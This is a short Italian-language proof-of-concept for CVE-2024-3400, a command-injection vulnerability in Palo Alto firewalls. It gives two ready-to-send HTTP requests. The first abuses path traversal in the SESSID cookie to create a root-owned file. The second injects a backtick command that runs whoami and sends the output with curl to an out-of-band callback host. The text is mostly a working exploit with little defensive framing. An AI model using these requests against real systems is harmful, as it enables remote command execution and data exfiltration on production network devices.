
Proof-of-concept exploit per CVE-2024-3400, una vulnerabilità di command injection nei firewall Palo Alto, che dimostra la creazione di file e l'esecuzione remota di comandi tramite richieste HTTP appositamente predisposte.
CVE-2024-3400 è una vulnerabilità di injection di comandi presente nel sistema firewall Palo Alto. Un attaccante, tramite una richiesta HTTP appositamente costruita, può eseguire comandi malevoli sul server di destinazione e persino ottenere privilegi di root.
POST /ssl-vpn/hipreport.esp HTTP/1.1
Host: 127.0.0.1
Cookie: SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/images/hellome1337.txt;
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
Dopo aver inviato questa richiesta, sul server verrà creato un file denominato hellome1337.txt e tale file avrà privilegi di root.
Lo screenshot mostra l'effetto durante il processo di sfruttamento di questa vulnerabilità:


Per sfruttare la vulnerabilità ed eseguire l'injection di comandi, è possibile inviare la seguente richiesta HTTP:
POST /ssl-vpn/hipreport.esp HTTP/1.1
Host: 127.0.0.1
Cookie: SESSID=./../../../opt/panlogs/tmp/device_telemetry/minute/h4`curl${IFS}xxxxxxxxxxxxxxxxx.oast.fun?test=$(whoami)`;
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
Questa richiesta esegue il comando whoami sul server e invia il risultato a un server remoto specificato (ad esempio: xxxxxxxxxxxxxxxxx.oast.fun).